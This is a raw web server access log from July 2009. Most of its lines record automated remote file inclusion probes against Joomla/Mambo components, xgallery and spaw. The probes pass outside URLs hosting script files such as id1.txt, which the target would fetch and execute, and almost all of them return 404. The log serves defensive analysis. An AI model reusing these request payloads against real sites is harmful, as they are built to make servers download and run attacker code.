217.147.30.80 - - [12/Jul/2009:00:22:04 -0400] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:22:04 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:22:04 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:22:04 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:22:04 -0400] "GET /logs/access_log.Q109060600//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:22:04 -0400] "GET /logs/access_log.Q109063000//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:22:05 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:22:05 -0400] "GET /logs/access_log.Q109051600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:22:05 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:22:06 -0400] "GET /logs/access_log.Q109051600%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:22:06 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:22:06 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:22:06 -0400] "GET /logs/access_log.Q109051600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:22:06 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:22:11 -0400] "GET /logs/access_log.Q109062900//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:22:11 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:22:11 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:22:12 -0400] "GET /logs/access_log.Q109062000/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:22:12 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:22:12 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:22:13 -0400] "GET /logs/access_log.Q109062900//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:22:16 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:22:20 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:22:20 -0400] "GET /logs/access_log.Q109051600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:22:28 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:22:28 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:22:28 -0400] "GET /logs/access_log.Q109060600//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:22:29 -0400] "GET /logs/access_log.Q109063000//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:22:32 -0400] "GET /logs/error_log.Q109062000/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:22:35 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:22:36 -0400] "GET /logs/access_log.Q109062900//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:22:45 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:22:51 -0400] "GET /logs/access_log.Q109062900//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:22:52 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:22:52 -0400] "GET /logs/access_log.Q109060600//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:22:52 -0400] "GET /logs/access_log.Q109063000//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:22:56 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:22:58 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:22:59 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:23:02 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:23:03 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:23:03 -0400] "GET /logs/access_log.Q109051600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:23:05 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:23:07 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:23:07 -0400] "GET /logs/access_log.Q109051600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:23:07 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:23:07 -0400] "GET /logs/access_log.Q109051600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:23:32 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:23:32 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:23:32 -0400] "GET /logs/access_log.Q109062000/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:23:49 -0400] "GET /logs/error_log.Q109062000/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:23:51 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:23:51 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:23:51 -0400] "GET /logs/access_log.Q109062000/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:24:11 -0400] "GET /logs/error_log.Q109062000/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:24:43 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:24:43 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:24:44 -0400] "GET /logs/access_log.Q109060600//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:24:45 -0400] "GET /logs/access_log.Q109063000//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:00:25:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.30.80 - - [12/Jul/2009:00:27:08 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:27:09 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:27:09 -0400] "GET /logs/access_log.Q109051600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:27:19 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:27:19 -0400] "GET /logs/access_log.Q109060600//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:27:20 -0400] "GET /logs/access_log.Q109063000//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:27:21 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.30.78.244 - - [12/Jul/2009:00:28:44 -0400] "GET /images/_notes/nav_store_fav_off_r1_c3.jpg.mno HTTP/1.0" 200 210 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.11.230.36 - - [12/Jul/2009:00:28:47 -0400] "GET /logs/access_log.Q109061600//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
77.222.40.247 - - [12/Jul/2009:00:28:52 -0400] "GET /logs//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
77.222.40.247 - - [12/Jul/2009:00:28:52 -0400] "GET /logs/access_log.Q109060100//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
77.222.40.247 - - [12/Jul/2009:00:28:52 -0400] "GET //spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
66.11.230.36 - - [12/Jul/2009:00:29:00 -0400] "GET /logs/access_log.Q109062100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
77.221.130.14 - - [12/Jul/2009:00:29:04 -0400] "GET /logs//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt?%0D?? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
77.221.130.14 - - [12/Jul/2009:00:29:05 -0400] "GET /logs/access_log.Q109060100//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt?%0D?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
77.221.130.14 - - [12/Jul/2009:00:29:05 -0400] "GET //spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt?%0D?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
92.50.143.90 - - [12/Jul/2009:00:29:05 -0400] "GET /logs/access_log.Q109060100//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.803"
92.50.143.90 - - [12/Jul/2009:00:29:05 -0400] "GET //spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
92.50.143.90 - - [12/Jul/2009:00:29:05 -0400] "GET /logs//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
77.222.40.247 - - [12/Jul/2009:00:29:06 -0400] "GET /logs/access_log.Q109062500//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
92.50.143.90 - - [12/Jul/2009:00:29:18 -0400] "GET /logs/access_log.Q109062500//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.803"
77.221.130.14 - - [12/Jul/2009:00:29:25 -0400] "GET /logs/access_log.Q109062500//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt?%0D?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
217.147.30.80 - - [12/Jul/2009:00:29:41 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:29:59 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:30:01 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:30:01 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:30:01 -0400] "GET /logs/access_log.Q109051800%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:30:01 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:30:01 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:30:01 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:30:01 -0400] "GET /logs/access_log.Q109051800%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:30:02 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.2.151.107 - - [12/Jul/2009:00:30:11 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.2.151.107 - - [12/Jul/2009:00:30:11 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
217.147.30.80 - - [12/Jul/2009:00:30:11 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.2.151.107 - - [12/Jul/2009:00:30:13 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.2.151.107 - - [12/Jul/2009:00:30:13 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
190.144.44.36 - - [12/Jul/2009:00:30:14 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Jul/2009:00:30:14 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Jul/2009:00:30:14 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Jul/2009:00:30:30 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Jul/2009:00:30:30 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Jul/2009:00:30:30 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:30:31 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:30:31 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:30:31 -0400] "GET /logs/access_log.Q109060800%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:30:32 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:30:32 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:30:32 -0400] "GET /logs/access_log.Q109060800%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:30:32 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.0.145.1 - - [12/Jul/2009:00:30:33 -0400] "GET /logs/access_log.Q109061600//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:00:30:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.144.44.36 - - [12/Jul/2009:00:30:34 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Jul/2009:00:31:06 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:31:50 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
